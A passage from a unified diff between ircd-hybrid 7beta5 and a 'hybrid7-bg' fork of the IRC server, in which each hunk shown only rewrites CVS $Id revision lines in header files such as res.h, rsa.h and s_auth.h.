+ * $Id: patricia.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  * Dave Plonka <plonka@doit.wisc.edu>
  *
  * This product includes software developed by the University of Michigan,
diff -uNrd ircd-hybrid-7beta5/include/res.h hybrid7-bg/include/res.h
--- ircd-hybrid-7beta5/include/res.h	Wed Mar 28 00:50:10 2001
+++ hybrid7-bg/include/res.h	Tue Jun  5 12:35:44 2001
@@ -1,5 +1,5 @@
 /*
- * $Id: res.h,v 7.17 2001/03/28 05:50:10 db Exp $ 
+ * $Id: res.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $ 
  * New res.h
  * Aaron Sethman <androsyn@ratbox.org>
  */
diff -uNrd ircd-hybrid-7beta5/include/restart.h hybrid7-bg/include/restart.h
--- ircd-hybrid-7beta5/include/restart.h	Fri Oct  6 00:26:58 2000
+++ hybrid7-bg/include/restart.h	Tue Jun  5 12:35:44 2001
@@ -1,5 +1,5 @@
 /*
- * $Id: restart.h,v 7.3 2000/10/06 04:26:58 lusky Exp $ 
+ * $Id: restart.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $ 
  */
 
 #ifndef INCLUDED_restart_h
diff -uNrd ircd-hybrid-7beta5/include/rsa.h hybrid7-bg/include/rsa.h
--- ircd-hybrid-7beta5/include/rsa.h	Fri Apr 13 18:39:43 2001
+++ hybrid7-bg/include/rsa.h	Tue Jun  5 12:35:44 2001
@@ -19,7 +19,7 @@
  *
  *
  *
- * $Id: rsa.h,v 7.2 2001/04/13 22:39:43 davidt Exp $
+ * $Id: rsa.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 
 int generate_challenge( char ** r_challenge, char ** r_response, char * key );
diff -uNrd ircd-hybrid-7beta5/include/s_auth.h hybrid7-bg/include/s_auth.h
--- ircd-hybrid-7beta5/include/s_auth.h	Mon Feb 26 01:53:47 2001
+++ hybrid7-bg/include/s_auth.h	Tue Jun  5 12:35:44 2001
@@ -15,7 +15,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: s_auth.h,v 7.13 2001/02/26 06:53:47 androsyn Exp $
+ *   $Id: s_auth.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  */
 #ifndef INCLUDED_s_auth_h
 #define INCLUDED_s_auth_h
diff -uNrd ircd-hybrid-7beta5/include/s_bsd.h hybrid7-bg/include/s_bsd.h
--- ircd-hybrid-7beta5/include/s_bsd.h	Mon Feb 12 00:13:24 2001
+++ hybrid7-bg/include/s_bsd.h	Tue Jun  5 12:35:44 2001
@@ -16,7 +16,7 @@
  *   along with this program; if not, write to the Free Software
  *   Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
  *
- *   $Id: s_bsd.h,v 7.27 2001/02/12 05:13:24 androsyn Exp $
+ *   $Id: s_bsd.h,v 1.1.1.1 2001/06/05 16:35:44 demond Exp $
  *
  */
 #ifndef INCLUDED_s_bsd_h
